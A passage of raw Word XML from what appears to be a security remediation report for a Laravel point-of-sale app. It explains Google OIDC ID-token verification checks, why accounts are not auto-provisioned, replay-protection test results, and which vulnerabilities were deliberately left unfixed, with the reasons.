        <w:t xml:space="preserve">, so a callback works at most once. The browser carries only the opaque state  which means an XSS in the SPA cannot steal anything that would let an attacker complete someone else's sign-in. Given this application </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">had</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> a stored XSS, that is not a hypothetical consideration.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A6">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6.4 ID token verification  eight explicit checks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A7">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Laravel Socialite would do the code exchange in one line, but </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">it does not verify the ID token</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — it calls the userinfo endpoint instead. The verification </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the security boundary, so GoogleOidcService::verifyIdToken performs it explicitly with firebase/php-jwt :</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table7"/>
        <w:tblW w:w="10194.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="38.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0400"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="324"/>
        <w:gridCol w:w="1769"/>
        <w:gridCol w:w="8101"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="324"/>
            <w:gridCol w:w="1769"/>
            <w:gridCol w:w="8101"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>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A8">
            <w:pPr>
              <w:spacing w:after="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A9">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="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Check</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AA">
            <w:pPr>
              <w:spacing w:after="0"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Why it matters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="67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B">
            <w:pPr>
              <w:spacing w:after="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AC">
            <w:pPr>
              <w:spacing w:after="36" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="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Signature vs</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AD">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="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Google's JWKS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E">
            <w:pPr>
              <w:spacing w:after="0"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JWT is just base64 until its signature is checked</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AF">
            <w:pPr>
              <w:spacing w:after="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0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="5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iss</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1">
            <w:pPr>
              <w:spacing w:after="0"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Confirms Google minted it, not another provider</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="67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B2">
            <w:pPr>
              <w:spacing w:after="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B3">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="1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aud = our client id</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4">
            <w:pPr>
              <w:spacing w:after="0"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Without this, a token legitimately issued to any other Google OAuth client replays here with a perfectly valid signature. The most commonly omitted check in hand-written OIDC code.</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5">
            <w:pPr>
              <w:spacing w:after="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6">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="5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 / iat</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7">
            <w:pPr>
              <w:spacing w:after="0"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60s skew; future-dated tokens refused</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="446"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8">
            <w:pPr>
              <w:spacing w:after="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9">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="5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nonce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A">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="45"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hash_equals against this flow's value</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B">
            <w:pPr>
              <w:spacing w:after="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C">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="5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email present</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D">
            <w:pPr>
              <w:spacing w:after="0"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It is what we match a staff record on</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="439"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E">
            <w:pPr>
              <w:spacing w:after="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BF">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="5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email_verified</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C0">
            <w:pPr>
              <w:spacing w:after="0"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 a consumer account an unverified address proves nothing about who controls it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="671"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1">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="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2">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="5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hd</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C3">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="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Enforced on the claim, not the request parameter — that parameter is only a hint to Google's account chooser and the user can simply delete it from the URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C4">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JWKS is cached for an hour because Google rotates those keys; a hard-coded copy would break sign-in at the next rotation. A fetch failure does </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> fall back to a stale key set failing sign-in beats verifying against keys that may have been revoked.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="8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6.5 No auto-provisioning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C6">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Google account with no matching staff record is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">refused with 403</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Creating one automatically would recreate V-01 with extra steps: anyone with a Google account could sign up.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C7">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Google answers "who is this person". It has no opinion on whether they work here, and none at all on whether they are an administrator.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Role, department and is_active are never read from the token.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C8">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="10"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Matching is on google_id (the OIDC sub ) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C9">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="10"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">first</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, then email. The subject is the stable identifier; an email address can be changed, or in a Workspace domain reassigned to a different person entirely  matching on address alone would hand the previous holder's POS account to whoever inherits it.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0" w:before="280" w:lineRule="auto"/>
        <w:ind w:left="24"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6.6 Verification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CB">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GET /api/auth/google/redirect</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CC">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response_type        = code          (Authorization Code, not Implicit)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CD">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code_challenge_method= S256          (not "plain")</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CE">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code_challenge       = 43 chars      (correct S256 base64url length)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CF">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nonce, state         = 40 chars each</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D0">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code_verifier in response?  no</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D1">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client_secret in response?  no</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D2">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POST /api/auth/google/callback</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D3">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unknown state           → 400  + audit entry auth.google.state_rejected</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D4">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valid state, 1st use    → accepted (then 401: deliberately fake code)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D5">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:left w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:bottom w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:right w:color="000000" w:space="4" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="140" w:right="16" w:hanging="10"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">same state, 2nd use     → 400  ← replay refused</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="80" w:before="280" w:lineRule="auto"/>
        <w:ind w:left="24" w:hanging="1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7. Vulnerabilities not fixed, and why</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D7">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assignment asks for these explicitly. Each was considered a decision, not an oversight.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="446" w:hanging="221"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NF-1 · Encryption of customer PII at rest.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The customers table stores names, addresses, phone numbers and NIC numbers in plain text. Laravel's encrypted cast would protect them against a database-file compromise or a stolen backup.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D9">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Why not:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> an encrypted column cannot be indexed or LIKE -searched, and customer search by name and phone is the single most-used feature on the till. Doing it properly needs blind indexing (a searchable HMAC of the normalized value alongside the ciphertext), which is a data-migration and query-rewrite project across six controllers. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigated:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the paths that expose this data are now authenticated, role-gated and department-scoped (V-01/V-02/V-03), and reading it is audited.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="446" w:hanging="221"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NF-2 · httpOnly; SameSite=Strict cookie instead of a bearer token.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> A cookie script cannot read at all is strictly better than any token the page can reach.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DB">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="10"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Why not:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> it requires Sanctum's stateful SPA mode and a shared parent domain, and this app is deployed cross-origin  Vercel frontend, shared-host API. Changing that is a deployment-topology decision, not a code change. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigated:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> per-tab in-memory storage instead of localStorage , 8-hour server-side expiry, role-scoped abilities, XSS removed at source (V13), and a strict CSP (V-18). The residual window is one tab-session rather than forever.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="446" w:hanging="221"/>
        <w:rPr>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NF-3 · MFA / TOTP for administrators.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The highest value remains in control.</w:t>
      </w:r>
    </w:p>
